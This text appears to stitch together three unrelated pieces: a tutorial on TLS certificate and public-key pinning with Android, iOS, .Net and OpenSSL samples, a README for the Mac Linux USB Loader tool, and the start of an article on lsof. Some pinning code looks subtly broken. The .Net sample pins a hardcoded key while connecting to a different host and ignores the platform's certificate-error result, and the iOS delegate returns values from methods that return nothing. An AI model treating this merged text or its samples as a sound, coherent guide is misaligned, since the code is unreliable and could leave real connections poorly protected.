A perfect case in point: during the two weeks or so of preparation for the presentation and cheat sheet, we’ve observed three relevant and related failures. First was Nokia/Opera willfully breaking the secure channel; second was DigiCert issuing a code signing certificate for malware; and third was Bit9’s loss of its root signing key. The environment is not only hostile, it’s toxic.

When Do You Whitelist?

If you are working for an organization which practices “egress filtering” as part of a Data Loss Prevention (DLP) strategy, you will likely encounter Interception Proxies. I like to refer to these things as “good” bad guys (as opposed to “bad” bad guys) since both break end-to-end security and we can’t tell them apart. In this case, do not offer to whitelist the interception proxy since it defeats your security goals. Add the interception proxy’s public key to your pinset after being instructed to do so by the folks in Risk Acceptance.

Note: if you whitelist a certificate or public key for a different host (for example, to accommodate an interception proxy), you are no longer pinning the expected certificates and keys for the host. Security and integrity on the channel could suffer, and it surely breaks end-to-end security expectations of users and organizations.

For more reading on interception proxies, the additional risk they bestow, and how they fail, see Dr. Matthew Green’s How do Interception Proxies fail? and Jeff Jarmoc’s BlackHat talk SSL/TLS Interception Proxies and Transitive Trust.

How Do You Pin?

The idea is to re-use the existing protocols and infrastructure, but use them in a hardened manner. For re-use, a program would keep doing the things it used to do when establishing a secure connection.

To harden the channel, the program would take advantage of the OnConnect callback offered by a library, framework or platform. In the callback, the program would verify the remote host’s identity by validating its certificate or public key. While pinning does not have to occur in an OnConnect callback, it’s often most convenient because the underlying connection information is readily available.

What Should Be Pinned?

The first thing to decide is what should be pinned. For this choice, you have two options: you can (1) pin the certificate; or (2) pin the public key. If you choose public keys, you have two additional choices: (a) pin the subjectPublicKeyInfo; or (b) pin one of the concrete types such as RSAPublicKey or DSAPublicKey.

The three choices are explained below in more detail. I would encourage you to pin the subjectPublicKeyInfo because it has the public parameters (such as {e,n} for an RSA public key) and contextual information such as an algorithm and OID. The context will help you keep your bearings at times, and Figure 1 below shows the additional information available.
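As an aside, one way to obtain a site’s subjectPublicKeyInfo in DER form, ready to embed as a pin, is with the OpenSSL command line; the output file name below is arbitrary, and random.org is simply the site used by the samples in this article:

# Fetch the server certificate, extract the public key (subjectPublicKeyInfo),
# and convert it to DER for embedding or comparison
$ openssl s_client -connect www.random.org:443 < /dev/null 2>/dev/null \
    | openssl x509 -pubkey -noout \
    | openssl pkey -pubin -outform DER -out random-org-spki.der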

Encodings/Formats

For the purposes of this article, the objects are in X509-compatible presentation format (PKCS#1 defers to X509, both of which use ASN.1). If you have a PEM encoded object (for example, -----BEGIN CERTIFICATE-----, -----END CERTIFICATE-----), then convert the object to DER encoding. Conversion using OpenSSL is offered below in Format Conversions.

A certificate is an object which binds an entity (such as a person or organization) to a public key via a signature. The certificate is DER encoded, and has associated data or attributes such as Subject (who is identified or bound), Issuer (who signed it), Validity (NotBefore and NotAfter), and a Public Key.

A certificate has a subjectPublicKeyInfo. The subjectPublicKeyInfo is a key with additional information. The ASN.1 type includes an Algorithm ID, a Version, and an extensible format to hold a concrete public key. Figures 1 and 2 below show different views of the same RSA key, which is the subjectPublicKeyInfo. The key is for the site random.org, and it is used in the sample programs and listings below.

Figure 1: subjectPublicKeyInfo dumped with dumpasn1

Figure 2: subjectPublicKeyInfo under a hex editor

The concrete public key is an encoded public key. The key format will usually be specified elsewhere – for example, PKCS#1 in the case of RSA Public Keys. In the case of an RSA public key, the type is RSAPublicKey and the parameters {e,n} will be ASN.1 encoded. Figures 1 and 2 above clearly show the modulus (n at line 28) and exponent (e at line 289). For DSA, the concrete type is DSAPublicKey and the ASN.1 encoded parameters would be {p,q,g,y}.

Final takeaways: (1) a certificate binds an entity to a public key; (2) a certificate has a subjectPublicKeyInfo; and (3) a subjectPublicKeyInfo has a concrete public key. For those who want to learn more, a more in-depth discussion from a programmer’s perspective can be found at the Code Project’s article Cryptographic Interoperability: Keys.

Certificate


The certificate is easiest to pin. You can fetch the certificate out of band for the website, have the IT folks email your company certificate to you, use openssl s_client to retrieve the certificate etc. When the certificate expires, you would update your application. Assuming your application has no bugs or security defects, the application would be updated every year or two.

At runtime, you retrieve the website or server’s certificate in the callback. Within the callback, you compare the retrieved certificate with the certificate embedded within the program. If the comparison fails, then fail the method or function.

There is a downside to pinning a certificate. If the site rotates its certificate on a regular basis, then your application would need to be updated regularly. For example, Google rotates its certificates, so you will need to update your application about once a month (if it depended on Google services). Even though Google rotates its certificates, the underlying public keys (within the certificate) remain static.

Public Key


Public key pinning is more flexible but a little trickier due to the extra steps necessary to extract the public key from a certificate. As with a certificate, the program checks the extracted public key with its embedded copy of the public key.

There are two downsides to public key pinning. First, it’s harder to work with keys (versus certificates) since you usually must extract the key from the certificate. Extraction is a minor inconvenience in Java and .Net, but it’s uncomfortable in Cocoa/CocoaTouch and OpenSSL. Second, the key is static and may violate key rotation policies.

Hashing

While the three choices above used DER encoding, it’s also acceptable to use a hash of the information (or other transforms). In fact, the original sample programs were written using digested certificates and public keys. The samples were changed to allow a programmer to inspect the objects with tools like dumpasn1 and other ASN.1 decoders.

Hashing also provides three additional benefits. First, hashing allows you to anonymize a certificate or public key. This might be important if your application is concerned about leaking information during decompilation and re-engineering.

Second, a digested certificate fingerprint is often available as a native API for many libraries, so it’s convenient to use.

Finally, an organization might want to supply a reserve (or back-up) identity in case the primary identity is compromised. Hashing ensures your adversaries do not see the reserved certificate or public key in advance of its use. In fact, Google’s IETF draft websec-key-pinning uses the technique.
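For example, assuming a DER-encoded subjectPublicKeyInfo is already at hand (random-org-spki.der is a placeholder name), a SHA-256 digest suitable for a pinset entry can be produced with OpenSSL:

# Hex digest of the DER-encoded subjectPublicKeyInfo
$ openssl dgst -sha256 random-org-spki.der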

What About X509?

PKI{X} and the Internet form an intersection. What Internet users expect and what they receive from CAs could vary wildly. For example, an Internet user has security goals, while a CA has revenue goals and legal goals. Many are surprised to learn that the user is often required to perform host identity verification even though the CA issued the certificate (the details are buried in CA warranties on their certificates and their Certification Practice Statement (CPS)).

There are a number of PKI profiles available. For the Internet, “Internet X.509 Public Key Infrastructure Certificate and Certificate Revocation List (CRL)”, also known as RFC 5280, is of interest. Since a certificate is specified in the ITU’s X509 standard, there are lots of mandatory and optional fields available for validation from both bodies. Because of the disjoint goals among groups, the next section provides guidance.

Mandatory Checks

All X509 verifications must include:

  • A path validation check. The check verifies all the signatures on certificates in the chain are valid under a given PKI. The check begins at the server or service’s certificate (the leaf), and proceeds back to a trusted root certificate (the root).
  • A validity check, or the notBefore and notAfter fields. The notAfter field is especially important since a CA will not warrant the certificate after the date, and it does not have to provide CRL/OCSP updates after the date.
  • Revocation status. As with notAfter, revocation is important because the CA will not warrant a certificate once it is listed as revoked. The IETF-approved way of checking a certificate’s revocation status is OCSP, specified in RFC 2560.
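For illustration, the same three checks can be exercised from the OpenSSL command line; the file names and the OCSP responder URL below are placeholders:

# Path validation against a trusted root store
$ openssl verify -CAfile trusted-roots.pem -untrusted intermediates.pem leaf.pem
# Validity window (notBefore / notAfter)
$ openssl x509 -in leaf.pem -noout -dates
# Revocation status via OCSP
$ openssl ocsp -issuer intermediates.pem -cert leaf.pem -url http://ocsp.example.com -CAfile trusted-roots.pem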

Optional Checks

[Mulling over what else to present, and the best way to present it. Subject name? DNS lookups? Key Usage? Algorithms? Geolocation based on IP? Check back soon.]

In the model which pre-dated PKIX (RFC 5280), X.509v1, there was a strong binding of the certificate Subject name to the X.500 Directory. With the update to X.509v3, the Directory is still the standard for authentication of caCertificate attributes, versus accepting a self-signed root. Geolocation also matters: the fake certificate for Google was given a location of Florida, instead of Mountain View, CA. The binding of the certificate to the Directory can anchor the root caCertificate, in effect “pin” it, to a valid entity that can have demonstrable attributes such as location. This is detailed in RFC 1255.

Additional fields, such as the subject alternative name (for example, an RFC 822 email address or a DNS name), can be located in the DNS, but the actual heavy lifting is done by the X.500 Directory, which is currently used as a cross-certificate trust conduit at the Federal Bridge between major communities of interest that are not Internet focused. While those cross-certificates are valuable for validation between trust communities, a self-signed root still needs to be either pinned, curated in a trust bundle (such as a web browser’s secure storage), or represented by a federated community. The Directory can play a role in filling gaps to validate caCertificates, either locally or nationally under an administrative domain such as c=US. By divorcing the subject from the Directory entry, problems begin to arise, and pinning plays a key role in ensuring that client and server have the same reference points.

Public Key Checks

Quod vide (q.v.). Verifying the identity of a host with knowledge of its associated/expected public key is pinning.

Examples of Pinning

This section demonstrates certificate and public key pinning in Android Java, iOS, .Net, and OpenSSL. All programs attempt to connect to random.org and fetch bytes (Dr. Mads Haahr participates in AOSP’s pinning program, so the site should have a static key). The programs enjoy a pre-existing relationship with the site (more correctly, a priori knowledge), so they include a copy of the site’s public key and pin the identity on the key.

Parameter validation, return value checking, and error checking have been omitted in the code below, but are present in the sample programs, so the sample programs are ready for copy/paste. By far, the most uncomfortable languages are the C-based ones: iOS and OpenSSL.

HTTP pinning

RFC 7469 introduced a new HTTP header that allows SSL servers to declare hashes of their certificates, along with a time scope during which these certificates should not be changed. For example:

      Public-Key-Pins: max-age=2592000;
      pin-sha256="E9CZ9INDbd+2eRQozYqqbQ2yXLVKB9+xcprMF+44U1g=";
      pin-sha256="LPJNul+wow4m6DsqxbninhsWHlwfp0JecwQzYpOLmCQ=";
      report-uri="http://example.com/pkp-report"

Please note that RFC 7469 is controversial since it allows overrides for locally installed authorities. That is, it allows an adversary or other party who successfully phishes the user to override a known good pinset with non-authentic or fraudulent information. Second, the reporting mechanism is suppressed from broken pinsets, so a complying user agent will be complicit in the cover up after the fact. That is, the reporting of the broken pinset is called out as MUST NOT report [1].
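For reference, a pin-sha256 value like the ones shown above can be computed from a live server with OpenSSL (the host name is only an example):

# SHA-256 over the DER-encoded subjectPublicKeyInfo, base64 encoded
$ openssl s_client -connect example.com:443 < /dev/null 2>/dev/null \
    | openssl x509 -pubkey -noout \
    | openssl pkey -pubin -outform DER \
    | openssl dgst -sha256 -binary \
    | base64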

Android

Pinning in Android is accomplished through a custom X509TrustManager. X509TrustManager should perform the customary X509 checks in addition to performing the pin.

Download: Android sample program

import java.math.BigInteger;
import java.security.KeyStore;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.security.interfaces.RSAPublicKey;
import javax.net.ssl.TrustManager;
import javax.net.ssl.TrustManagerFactory;
import javax.net.ssl.X509TrustManager;

public final class PubKeyManager implements X509TrustManager
{
  private static String PUB_KEY = "30820122300d06092a864886f70d0101" +
    "0105000382010f003082010a0282010100b35ea8adaf4cb6db86068a836f3c85" +
    "5a545b1f0cc8afb19e38213bac4d55c3f2f19df6dee82ead67f70a990131b6bc" +
    "ac1a9116acc883862f00593199df19ce027c8eaaae8e3121f7f329219464e657" +
    "2cbf66e8e229eac2992dd795c4f23df0fe72b6ceef457eba0b9029619e0395b8" +
    "609851849dd6214589a2ceba4f7a7dcceb7ab2a6b60c27c69317bd7ab2135f50" +
    "c6317e5dbfb9d1e55936e4109b7b911450c746fe0d5d07165b6b23ada7700b00" +
    "33238c858ad179a82459c4718019c111b4ef7be53e5972e06ca68a112406da38" +
    "cf60d2f4fda4d1cd52f1da9fd6104d91a34455cd7b328b02525320a35253147b" +
    "e0b7a5bc860966dc84f10d723ce7eed5430203010001";

  public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException
  {
    if (chain == null) {
      throw new IllegalArgumentException("checkServerTrusted: X509Certificate array is null");
    }

    if (!(chain.length > 0)) {
      throw new IllegalArgumentException("checkServerTrusted: X509Certificate is empty");
    }

    if (!(null != authType && authType.equalsIgnoreCase("RSA"))) {
      throw new CertificateException("checkServerTrusted: AuthType is not RSA");
    }

    // Perform customary SSL/TLS checks
    try {
      TrustManagerFactory tmf = TrustManagerFactory.getInstance("X509");
      tmf.init((KeyStore) null);
      
      for (TrustManager trustManager : tmf.getTrustManagers()) {
        ((X509TrustManager) trustManager).checkServerTrusted(chain, authType);
      }
    } catch (Exception e) {
      throw new CertificateException(e);
    }

    // Hack ahead: BigInteger and toString(). We know a DER encoded Public Key begins
    // with 0x30 (ASN.1 SEQUENCE and CONSTRUCTED), so there is no leading 0x00 to drop.
    RSAPublicKey pubkey = (RSAPublicKey) chain[0].getPublicKey();
    String encoded = new BigInteger(1 /* positive */, pubkey.getEncoded()).toString(16);

    // Pin it!
    final boolean expected = PUB_KEY.equalsIgnoreCase(encoded);
    if (!expected) {
      throw new CertificateException("checkServerTrusted: Expected public key: "
                + PUB_KEY + ", got public key: " + encoded);
    }
  }

  // Required by the X509TrustManager interface; not used for this server-side pin.
  public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
  }

  public X509Certificate[] getAcceptedIssuers() {
    return new X509Certificate[0];
  }
}

PubKeyManager would be used in code similar to below.

TrustManager tm[] = { new PubKeyManager() };

SSLContext context = SSLContext.getInstance("TLS");
context.init(null, tm, null);

URL url = new URL( "https://www.random.org/integers/?" +
                   "num=16&min=0&max=255&col=16&base=10&format=plain&rnd=new");

HttpsURLConnection connection = (HttpsURLConnection) url.openConnection();
connection.setSSLSocketFactory(context.getSocketFactory());

InputStreamReader instream = new InputStreamReader(connection.getInputStream());
StreamTokenizer tokenizer = new StreamTokenizer(instream);
...

iOS

iOS pinning is performed through a NSURLConnectionDelegate. The delegate must implement connection:canAuthenticateAgainstProtectionSpace: and connection:didReceiveAuthenticationChallenge:. Within connection:didReceiveAuthenticationChallenge:, the delegate must call SecTrustEvaluate to perform customary X509 checks.

Download: iOS sample program.

-(IBAction)fetchButtonTapped:(id)sender
{
    NSString* requestString = @"https://www.random.org/integers/?"
                              @"num=16&min=0&max=255&col=16&base=16&format=plain&rnd=new";
    NSURL* requestUrl = [NSURL URLWithString:requestString];

    NSURLRequest* request = [NSURLRequest requestWithURL:requestUrl
                                             cachePolicy:NSURLRequestReloadIgnoringLocalCacheData
                                         timeoutInterval:10.0f];

    NSURLConnection* connection = [[NSURLConnection alloc] initWithRequest:request delegate:self];
}

-(BOOL)connection:(NSURLConnection *)connection canAuthenticateAgainstProtectionSpace:
                  (NSURLProtectionSpace*)space
{
    return [[space authenticationMethod] isEqualToString: NSURLAuthenticationMethodServerTrust];
}

- (void)connection:(NSURLConnection *)connection didReceiveAuthenticationChallenge:
                   (NSURLAuthenticationChallenge *)challenge
{
  if ([[[challenge protectionSpace] authenticationMethod] isEqualToString: NSURLAuthenticationMethodServerTrust])
  {
    do
    {
      SecTrustRef serverTrust = [[challenge protectionSpace] serverTrust];
      if(nil == serverTrust)
        break; /* failed */

      OSStatus status = SecTrustEvaluate(serverTrust, NULL);
      if(!(errSecSuccess == status))
        break; /* failed */

      SecCertificateRef serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, 0);
      if(nil == serverCertificate)
        break; /* failed */

      CFDataRef serverCertificateData = SecCertificateCopyData(serverCertificate);
      [(id)serverCertificateData autorelease];
      if(nil == serverCertificateData)
        break; /* failed */

      const UInt8* const data = CFDataGetBytePtr(serverCertificateData);
      const CFIndex size = CFDataGetLength(serverCertificateData);
      NSData* cert1 = [NSData dataWithBytes:data length:(NSUInteger)size];

      NSString *file = [[NSBundle mainBundle] pathForResource:@"random-org" ofType:@"der"];
      NSData* cert2 = [NSData dataWithContentsOfFile:file];

      if(nil == cert1 || nil == cert2)
        break; /* failed */

      const BOOL equal = [cert1 isEqualToData:cert2];
      if(!equal)
        break; /* failed */

      // The only good exit point
      return [[challenge sender] useCredential: [NSURLCredential credentialForTrust: serverTrust]
                    forAuthenticationChallenge: challenge];
    } while(0);

    // Bad dog
    return [[challenge sender] cancelAuthenticationChallenge: challenge];
  }
}

.Net

.Net pinning can be achieved by using ServicePointManager as shown below.

Download: .Net sample program.

// Encoded RSAPublicKey
private static String PUB_KEY = "30818902818100C4A06B7B52F8D17DC1CCB47362" +
    "C64AB799AAE19E245A7559E9CEEC7D8AA4DF07CB0B21FDFD763C63A313A668FE9D764E" +
    "D913C51A676788DB62AF624F422C2F112C1316922AA5D37823CD9F43D1FC54513D14B2" +
    "9E36991F08A042C42EAAEEE5FE8E2CB10167174A359CEBF6FACC2C9CA933AD403137EE" +
    "2C3F4CBED9460129C72B0203010001";

public static void Main(string[] args)
{
  ServicePointManager.ServerCertificateValidationCallback = PinPublicKey;
  WebRequest wr = WebRequest.Create("https://encrypted.google.com/");
  wr.GetResponse();
}

public static bool PinPublicKey(object sender, X509Certificate certificate, X509Chain chain,
                                SslPolicyErrors sslPolicyErrors)
{
  if (null == certificate)
    return false;

  String pk = certificate.GetPublicKeyString();
  if (pk.Equals(PUB_KEY))
    return true;

  // Bad dog
  return false;
}

OpenSSL

Pinning can occur at one of two places with OpenSSL. First is the user supplied verify_callback. Second is after the connection is established via SSL_get_peer_certificate. Either method will allow you to access the peer’s certificate.

Though OpenSSL performs the X509 checks, you must fail the connection and tear down the socket on error. By design, a server that does not supply a certificate will result in X509_V_OK with a NULL certificate. To check the result of the customary verification: (1) you must call SSL_get_verify_result and verify the return code is X509_V_OK; and (2) you must call SSL_get_peer_certificate and verify the certificate is non-NULL.

Download: OpenSSL sample program.

int pkp_pin_peer_pubkey(SSL* ssl)
{
    if(NULL == ssl) return FALSE;
    
    X509* cert = NULL;
    FILE* fp = NULL;
    
    /* Scratch */
    int len1 = 0, len2 = 0;
    unsigned char *buff1 = NULL, *buff2 = NULL;
    
    /* Result is returned to caller */
    int ret = 0, result = FALSE;
    
    do
    {
        /* http://www.openssl.org/docs/ssl/SSL_get_peer_certificate.html */
        cert = SSL_get_peer_certificate(ssl);
        if(!(cert != NULL))
            break; /* failed */
        
        /* Begin Gyrations to get the subjectPublicKeyInfo       */
        /* Thanks to Viktor Dukhovni on the OpenSSL mailing list */
        
        /* http://groups.google.com/group/mailing.openssl.users/browse_thread/thread/d61858dae102c6c7 */
        len1 = i2d_X509_PUBKEY(X509_get_X509_PUBKEY(cert), NULL);
        if(!(len1 > 0))
            break; /* failed */
        
        /* scratch */
        unsigned char* temp = NULL;
        
        /* http://www.openssl.org/docs/crypto/buffer.html */
        buff1 = temp = OPENSSL_malloc(len1);
        if(!(buff1 != NULL))
            break; /* failed */
        
        /* http://www.openssl.org/docs/crypto/d2i_X509.html */
        len2 = i2d_X509_PUBKEY(X509_get_X509_PUBKEY(cert), &temp);

        /* These checks are verifying we got back the same values as when we sized the buffer.      */
        /* Its pretty weak since they should always be the same. But it gives us something to test. */
        if(!((len1 == len2) && (temp != NULL) && ((temp - buff1) == len1)))
            break; /* failed */
        
        /* End Gyrations */
        
        /* See the warning above!!!                                            */
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fopen.html */
        fp = fopen("random-org.der", "rx");
        if(NULL == fp) {
            fp = fopen("random-org.der", "r");
        }
        
        if(!(NULL != fp))
            break; /* failed */
        
        /* Seek to eof to determine the file's size                            */
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fseek.html */
        ret = fseek(fp, 0, SEEK_END);
        if(!(0 == ret))
            break; /* failed */
        
        /* Fetch the file's size                                               */
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/ftell.html */
        long size = ftell(fp);

        /* Arbitrary size, but should be relatively small (less than 1K or 2K) */
        if(!(size != -1 && size > 0 && size < 2048))
            break; /* failed */
        
        /* Rewind to beginning to perform the read                             */
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fseek.html */
        ret = fseek(fp, 0, SEEK_SET);
        if(!(0 == ret))
            break; /* failed */
        
        /* Re-use buff2 and len2 */
        buff2 = NULL; len2 = (int)size;
        
        /* http://www.openssl.org/docs/crypto/buffer.html */
        buff2 = OPENSSL_malloc(len2);
        if(!(buff2 != NULL))
            break; /* failed */
        
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fread.html */
        /* Returns number of elements read, which should be 1 */
        ret = (int)fread(buff2, (size_t)len2, 1, fp);
        if(!(ret == 1))
            break; /* failed */
        
        /* Re-use size. MIN and MAX macro below... */
        size = len1 < len2 ? len1 : len2;
        
        /*************************/
        /*****    PAYDIRT    *****/
        /*************************/
        if(len1 != (int)size || len2 != (int)size || 0 != memcmp(buff1, buff2, (size_t)size))
            break; /* failed */
        
        /* The one good exit point */
        result = TRUE;
        
    } while(0);
    
    if(fp != NULL)
        fclose(fp);
    
    /* http://www.openssl.org/docs/crypto/buffer.html */
    if(NULL != buff2)
        OPENSSL_free(buff2);
    
    /* http://www.openssl.org/docs/crypto/buffer.html */
    if(NULL != buff1)
        OPENSSL_free(buff1);
    
    /* http://www.openssl.org/docs/crypto/X509_new.html */
    if(NULL != cert)
        X509_free(cert);
    
    return result;
}

Pinning Alternatives

Not all applications use split key cryptography. Fortunately, there are protocols which allow you to set up a secure channel based on knowledge of passwords and pre-shared secrets (rather than putting the secret on the wire in a basic authentication scheme). Two are listed below – SRP and PSK. SRP and PSK have 88 cipher suites assigned to them by IANA for TLS, so there’s no shortage of choices.

Figure 3: IANA reserved cipher suites for SRP and PSK

SRP

Secure Remote Password (SRP) is a Password Authenticated Key Exchange (PAKE) by Thomas Wu based upon Diffie-Hellman. The protocol is standardized in RFC 5054 and available in the OpenSSL library (among others). In the SRP scheme, the server uses a verifier which consists of a {salt, hash(password)} pair. The user has the password and receives the salt from the server. With lots of hand waving, both parties select per-instance random values (nonces) and execute the protocol using g^((salt + password)|verifier) plus the nonces, rather than traditional Diffie-Hellman using g^(ab).

P=NP!!!

Diffie-Hellman based schemes are part of a family of problems based on Discrete Logs (DL), which are logarithms over a finite field. DL schemes are appealing because they are known to be hard (unless P=NP, which would cause computational number theorists to have a cow).

PSK

PSK is Pre-Shared Key and specified in RFC 4279 and RFC 4764. The shared secret is used as a pre-master secret in TLS-PSK for SSL/TLS; or used to key a block cipher in EAP-PSK. EAP-PSK is designed for authentication over insecure networks such as IEEE 802.11.
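As a rough illustration (the key value and port are made up, and option availability varies by OpenSSL version), a TLS-PSK connection can be exercised with the OpenSSL test tools:

# Test server keyed with a pre-shared secret, no certificate involved
$ openssl s_server -nocert -psk 1a2b3c4d5e6f -cipher PSK-AES128-CBC-SHA -accept 4433
# Client supplying the same pre-shared secret
$ openssl s_client -connect localhost:4433 -psk 1a2b3c4d5e6f -cipher PSK-AES128-CBC-SHA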

Miscellaneous

This section covers administrivia and miscellaneous items related to pinning.

Ephemeral Keys

Ephemeral keys are temporary keys used for one instance of a protocol execution and then thrown away. An ephemeral key has the benefit of providing forward secrecy, meaning a compromise of the site or service’s long term (static) signing key does not facilitate decrypting past messages because the key was temporary and discarded (once the session terminated).

Ephemeral keys do not affect pinning because the Ephemeral key is delivered in a separate ServerKeyExchange message. In addition, the ephemeral key is a key and not a certificate, so it does not change the construction of the certificate chain. That is, the certificate of interest will still be located at certificates[0].

Pinning Gaps

There are two gaps when pinning due to reuse of the existing infrastructure and protocols. First, an explicit challenge is not sent by the program to the peer server based on the server’s public information. So the program never knows if the peer can actually decrypt messages. However, the shortcoming is usually academic in practice since an adversary will receive messages it can’t decrypt.

Second is revocation. Clients don’t usually engage in revocation checking, so it could be possible to use a known bad certificate or key in a pinset. Even if revocation is active, Certificate Revocation Lists (CRLs) and Online Certificate Status Protocol (OCSP) can be defeated in a hostile environment. An application can take steps to remediate, with the primary means being freshness. That is, an application should be updated and distributed immediately when a critical security parameter changes.

No Relationship ^@$!

If you don’t have a pre-existing relationship, all is not lost. First, you can pin a host or server’s certificate or public key the first time you encounter it. If the bad guy was not active when you encountered the certificate or public key, he or she will not be successful with future funny business.

Second, bad certificates are being spotted more quickly in the field thanks to projects like Chromium and Certificate Patrol, and initiatives like the EFF’s SSL Observatory.

Third, help is on its way, and there are a number of futures that will assist with the endeavors:

  • Public Key Pinning (http://www.ietf.org/id/draft-ietf-websec-key-pinning-09.txt) – an extension to the HTTP protocol allowing web host operators to instruct user agents (UAs) to remember (“pin”) the hosts’ cryptographic identities for a given period of time.
  • DNS-based Authentication of Named Entities (DANE) (https://datatracker.ietf.org/doc/rfc6698/) – uses Secure DNS to associate Certificates with Domain Names For S/MIME, SMTP with TLS, DNSSEC and TLSA records.
  • Sovereign Keys (http://www.eff.org/sovereign-keys) – operates by providing an optional and secure way of associating domain names with public keys via DNSSEC. PKI (hierarchical) is still used. Semi-centralized with append only logging.
  • Convergence (http://convergence.io) – different [geographical] views of a site and its associated data (certificates and public keys). Web of Trust is used. Semi-centralized.

While Sovereign Keys and Convergence still require us to confer trust to outside parties, the parties involved do not serve shareholders or covet revenue streams. Their interests are industry transparency and user security.

More Information?

Pinning is an old new thing that has been shaken, stirred, and repackaged. While “pinning” and “pinsets” are relatively new terms for old things, Jon Larimer and Kenny Root spent time on the subject at Google I/O 2012 with their talk Security and Privacy in Android Apps.

Format Conversions

As a convenience to readers, the following will convert between PEM and DER format using OpenSSL.

# Public key, X509
$ openssl genrsa -out rsa-openssl.pem 3072
$ openssl rsa -in rsa-openssl.pem -pubout -outform DER -out rsa-openssl.der
# Private key, PKCS#8
$ openssl genrsa -out rsa-openssl.pem 3072
$ openssl pkcs8 -nocrypt -in rsa-openssl.pem -inform PEM -topk8 -outform DER -out rsa-openssl.der
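The same approach works for certificates, which is handy when embedding a DER copy such as random-org.der used in the samples above:

# Certificate, X509: PEM to DER and back
$ openssl x509 -in cert.pem -inform PEM -outform DER -out cert.der
$ openssl x509 -in cert.der -inform DER -outform PEM -out cert.pem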


Mac Linux USB Loader


Mac Linux USB Loader

Tool allowing you to put a Linux distribution on a USB drive and make it bootable on Intel Macs using EFI.

Mac Linux USB Loader logo

General Information

This is the Mac Linux USB Loader, a tool allowing you to take an ISO of a Linux distribution and make it boot using EFI. It requires a single USB drive formatted as FAT, with at least 2 GB of free space recommended. Mac Linux USB Loader is available under the 3-clause BSD license.

The tool is necessary to boot certain Linux distributions that do not have EFI booting support. Many distributions are adding this with the release of Windows 8, but it has not been finalized and is still nonstandard across most distributions. Many common distributions are supported, like Ubuntu and Linux Mint.

If you wish to contribute to the code or fork the repository, please do so. All development currently takes place on the master branch, and this is where code should be submitted for pull requests. The legacy branch contains the code for pre-3.0 versions of Mac Linux USB Loader; it will not be maintained and is present for historical interest only.

I created this tool, if you care, for several reasons:

  • None of the other tools available (esp. unetbootin) feel native and operate as you would expect on the Mac platform.
  • None of the other methods of which I am aware have the ability to make the archives boot on Intel Macs.
  • It was personally a pain in the neck getting Linux distributions to boot via USB on Macs.

That being said, it does have a few shortcomings:

  • Linux fails to have graphics on some Macs (i.e Macbook Pros with nVidia graphics), which in some cases prevents boot, but this is not necessarily an issue with Mac Linux USB Loader as much as it is an issue with the video drivers that ship with most distributions. Luckily, with Enterprise, which has been included with Mac Linux USB Loader since 2.0, you can use persistence to install the necessary video drivers on distributions like Ubuntu, helping to alleviate the issue.

Building from Source

Requirements: Xcode 6, OS X 10.10 SDK. OS X 10.8+ required to run built app

  1. Clone from git: git clone https://github.com/SevenBits/Mac-Linux-USB-Loader.git
  2. Run pod install (requires Cocoapods).
  3. Open Mac Linux USB Loader.xcworkspace and do an archive build, or simply run and debug it with Xcode

Acknowledgements

  • Used some icons from KDE’s Oxygen. link
  • Special thanks to Leander Lismond for translating the application into Dutch!

More information can be found at: https://github.com/SevenBits/Mac-Linux-USB-Loader, https://sevenbits.github.io/Mac-Linux-USB-Loader/ and https://github.com/SevenBits/Mac-Linux-USB-Loader/wiki

Linux super-duper admin tools: lsof


lsof is one of the more important tools you can use on your Linux box. Its name is somewhat misleading. lsof stands for list open files, but the term files fails to convey the true significance of its power. That is, unless you remember the fundamental lesson: in Linux, everything is a file.

We have had several super-duper admin articles, focusing around tools that help us understand better the behavior of our system, try to identify performance bottlenecks and solve issues that do not have an apparent, immediate presence in the logs. Save for vague, indirect symptoms, you might be struggling to understand what is happening under the hood.

Teaser

lsof, alongside strace and OProfile, is another extremely versatile, powerful weapon in the arsenal of a system administrator and the curious engineer. Used correctly, it can yield a wealth of information about your machine, helping you narrow down the problem solving and maybe even expose the culprit.

So let’s see what this cool tool can do.

Why is lsof so important?

I did say lsof is important, but I did not say why. Well, the thing is, with lsof you can do pretty much anything. It encompasses the functionality of numerous other tools that you may be familiar with.

For example, lsof can provide the same information netstat offers. You can use lsof to find mounts on your machine, so it supplements both /etc/mtab and /proc/mounts. You can use lsof to learn what open files a process holds. In general, pretty much anything you can find under the /proc filesystem, lsof can display in a simple, centralized manner, without writing custom scripts for looping through the sub-directories and parsing and filtering content.

lsof allows you to display information for particular users or processes, show only traffic for certain network protocols, list file handles, and more. Used effectively, it’s the Swiss Army knife of admin utilities.

lsof in action

A few demonstrations are in order.

Run without any parameters, lsof will display all of the information for all of the files. At this point, I should reiterate the fact there are many types of files. While most users treat their music and Office documents as files, the generic description goes beyond that. Devices, sockets, pipes, and directories are also files.

lsof output explained

Before we dig in, let’s take a look at a basic output:

Basic usage

Command is the name of the process. It also includes kernel threads. PID is the process ID. USER is the owner of the process. FD is the first truly interesting field.

The FD stands for File Descriptor, an abstract indicator for accessing files. File descriptors are indexes in kernel data structures called file descriptor tables, which contain details of all open files. Each process has its own file descriptor table. User applications that wish to read and write to files will instead read from and write to file descriptors using system calls. The exact type of the file descriptor determines what the read and write operations really mean.

In our example, we have several different values of FD listed. If you have ever looked under the /proc filesystem and examined the structure of a process, some of the entries will be familiar. For instance, cwd stands for the Current Working Directory of the listed process. txt is the Text Segment or the Code Segment (CS), the bit of the object containing executable instructions, or program code if you will. mem stands for Data Segments and Shared Objects loaded into memory. 10u refers to file descriptor 10, open for both reading and writing. rtd stands for root directory.

As you can see, you need to understand the output, but once you get the hang of it, it’s a blast. lsof provides a wealth of information, formatted for good looks, without too much effort. Now, it’s up to you to put the information to good use.

The fifth column, TYPE, is directly linked to the FD column. It tells us what type of file we’re working with. DIR stands for directory. REG is a regular file or a page in memory. FIFO is a named pipe. Symbolic links, sockets and device files (block and character) are also file types. unknown means that the FD descriptor is of unknown type and locked. You will encounter these only with kernel threads.

For more details, please read the super-extensive man page.

